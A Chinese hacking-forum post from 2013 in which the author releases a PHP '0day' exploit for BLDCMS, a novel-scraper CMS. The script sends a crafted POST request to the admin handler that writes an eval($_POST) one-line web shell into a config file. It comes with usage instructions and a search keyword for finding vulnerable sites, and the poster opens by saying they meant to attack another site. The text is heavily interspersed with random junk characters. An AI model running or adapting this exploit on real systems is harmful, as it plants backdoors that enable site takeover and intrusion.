之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞 M6 E5 Q3 p" F( ]' j6 Z8 `. _
& u" `0 W7 |4 B
) r7 ^0 i' t6 X: \3 v* T
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ]$ f1 p+ \/ z1 v$ `
3 `# A4 l b b3 L. N+ h+ E3 p既然都有人发了 我就把我之前写好的EXP放出来吧1 U4 e$ a5 w8 |8 ? L' M
1 j# N! Y1 s/ i/ P, \view source print?01.php;">
. |/ f; r* B6 P) R& @6 E! A02.<!--?php- Z3 b6 X, j- m
03.echo "-------------------------------------------------------------------
7 |0 F. ~/ _; Z4 b) u0 i! y04. & P/ F7 E$ e$ F& e3 u# y
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
1 c# c4 Z/ W0 v06. 2 T$ Y K, d* n, X7 N t' R6 e
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
6 y, h6 j( J4 k. ^, T4 B4 U+ N08. 6 l5 {7 E4 H$ R+ T/ g: w
09.QQ:981009941\r\n 2013.3.21\r\n # @$ w0 B5 e, r& D0 l7 O% `7 _
10. & C- S s# |9 a$ P
11.
2 W1 z& ~+ U2 K/ O12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
& Y( m" _! F4 z' G! C7 Y13. 2 z% h: G0 _0 k* T
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
* x2 z3 n% m; c: e9 W15. 2 j' G) e! N% e7 s1 F8 G/ y
16.--------------------------------------------------------------------\r\n";4 y) N0 t- v8 ^- O4 }
17.$url=$argv[1];
4 K3 w9 Z( n" A* p) F6 ]! t18.$dir=$argv[2];
. A: v- F4 g, ~& ^% c, X0 e19.$pass=$argv[3];% [' n' G6 K& ?4 n; ^6 p( N e
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
- t, L/ o9 d; e" J, Q" J21.if (emptyempty($pass)||emptyempty($url)): F/ v6 w1 d: j; P) @$ W: }" [
22.{exit("请输入参数");}% e, @# f: t {' o! c' g1 G
23.else
) B% ?7 m- J; I5 }, N) E$ e24.{. o6 g$ N) ~3 U4 ~
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
: m+ b6 j& U) t( @26. & u1 u/ h7 Y6 ]' ^
27.al;
. s) p8 \$ e# y- i* x4 b. F28.$length = strlen($fuckdata);
/ ^6 A& r$ k, z( q/ I& r29.function getshell($url,$pass)) Y% r6 s! x, Y
30.{; l" ], B7 y. y- v0 |% g* K
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
+ {9 g5 T2 B9 s: Q0 o32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
; O& q; l7 N- o; G33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";3 B8 t0 Y: d+ g( E
34.$header .= "User-Agent: MSIE\r\n";
; p3 A) A" x( C35.$header .= "Host:".$url."\r\n";
* V' R2 a5 B0 s- q3 }! n* N8 p36.$header .= "Content-Length: ".$length."\r\n";
- S+ x# e* H1 A( \4 Q37.$header .= "Connection: Close\r\n";
" c9 J6 k9 o+ v% X$ R38.$header .="\r\n";( O2 k8 [0 @ T$ M$ E
39.$header .= $fuckdata."\r\n\r\n";* T; R" x4 u; e8 p1 o
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
; w3 F0 N& h ^4 L3 }2 G41.if (!$fp)# {5 g D0 ?% Y9 ?: h' y1 Y1 Z" a7 i Y
42.{
8 W- d: D5 K/ c& K" [) Q43.exit ("利用失败:请检查指定目标是否能正常打开");
+ @/ Q5 E# ^6 ?/ t. \7 B1 z6 i4 G44.}
Z' x; ?# I4 N' n+ s0 b& @1 K0 P45.else{ if (!fputs($fp,$header))
# x, p. o% Q& X2 g& o9 c46.{exit ("利用失败");}# B+ G, j6 I1 x! N, L
47.else1 s, V( Y+ J; K; {1 Q+ F% z
48.{, j, l" f6 O0 Z" O/ p- B
49.$receive = '';* S$ Y0 M! I: ` G
50.while (!feof($fp)) {
r4 b, [; z, d' N! ]51.$receive .= @fgets($fp, 1000);
7 ?! e# E5 w5 a6 M+ Z7 L52.}
8 k* A' ^2 m% C# T6 ]53.@fclose($fp);0 |, B% D. t8 Z/ o0 ~
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
+ T* R- v, d. u; \# }2 R55.
1 A$ ^ H4 V8 _4 \) B56.GPC是否=off)";
1 v& p) R( r, {7 b6 e( _% Z* D57.}}
/ @! H& f- H/ Y7 f9 e58.}
8 k) \9 a2 V( |59.}; i$ S, i: y. l: [0 n3 y% A( A
60.getshell($url,$pass);
( e4 R; y+ r. o; c7 R+ p, x* m* @61.?--> V# q2 e5 \' t/ Y1 s
, c0 l8 H6 Y$ ~8 L3 k6 H, p- D0 c) S' S5 Y# u0 F
4 W& c$ v! A- v! `1 {7 X
by 数据流
4 j2 x6 S) P7 g6 y& m' o0 r3 W9 P |
发表于 2013-3-26 20:49:10
收藏
支持
反对